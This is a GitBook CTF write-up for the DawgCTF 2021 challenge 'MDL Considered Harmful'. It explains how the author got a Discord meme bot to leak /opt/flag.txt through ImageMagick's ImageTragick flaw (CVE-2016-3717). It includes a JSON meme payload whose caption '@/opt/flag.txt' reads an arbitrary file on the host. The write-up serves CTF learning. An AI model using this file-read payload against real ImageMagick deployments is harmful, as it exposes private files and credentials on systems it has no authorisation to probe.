πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
CTFs
HomePentestingLearn
Search…
🚩
Zeyu's CTF Writeups
Home
Pentesting
My Vulnerable Website
My Challenges
STANDCON CTF 2021
2021
HTX Investigator's Challenge 2021
Metasploit Community CTF
MetaCTF CyberGames
CyberSecurityRumble CTF
The InfoSecurity Challenge (TISC) 2021
SPbCTF's Student CTF Quals
Asian Cyber Security Challenge (ACSC) 2021
CSAW CTF Qualification Round 2021
YauzaCTF 2021
InCTF 2021
UIUCTF 2021
Google CTF 2021
TyphoonCon CTF 2021
DSTA BrainHack CDDC21
BCACTF 2.0
Zh3ro CTF V2
Pwn2Win CTF 2021
NorzhCTF 2021
DawgCTF 2021
Bofit
Jellyspotters
No Step On Snek
Back to the Lab 2
MDL Considered Harmful
Really Secure Algorithm
The Obligatory RSA Challenge
Trash Chain
What the Flip?!
Back to the Lab 1
Back to the Lab 3
Dr. Hrabowski's Great Adventure
Just a Comment
Baby's First Modulation
Two Truths and a Fib
UMDCTF 2021
Midnight Sun CTF 2021
picoCTF 2021
DSO-NUS CTF 2021
Powered By GitBook
MDL Considered Harmful
ImageMagick CVE-2016-3717

Problem

There's a bot named MDLChef in the Discord. You need to DM it, it doesn't respond in the server. On its host machine, there's a file at /opt/flag.txt - it contains the flag. Go get it.
Note: This is NOT an OSINT challenge. The source code really isn't available. Good luck.
Author: nb

Solution

If we use the /credits command, we can understand more of the stack.
We can see that ImageMagick is used.
I searched for ImageMagick exploits, and found https://imagetragick.com/.
It appears that if we use caption:@/path/to/file, we can read arbitrary files.
1
{
2
version: "MDL/1.1",
3
type: "meme",
4
base: {
5
format: "Meme.Legacy.BadLuckBrian"
6
},
7
caption: {
8
topText: "@/opt/flag.txt",
9
bottomText: "image tragick"
10
}
11
}
Copied!
The rendered image contains the flag:
Previous
Back to the Lab 2
Next
Really Secure Algorithm
Last modified 8mo ago
Copy link
Contents
Problem
Solution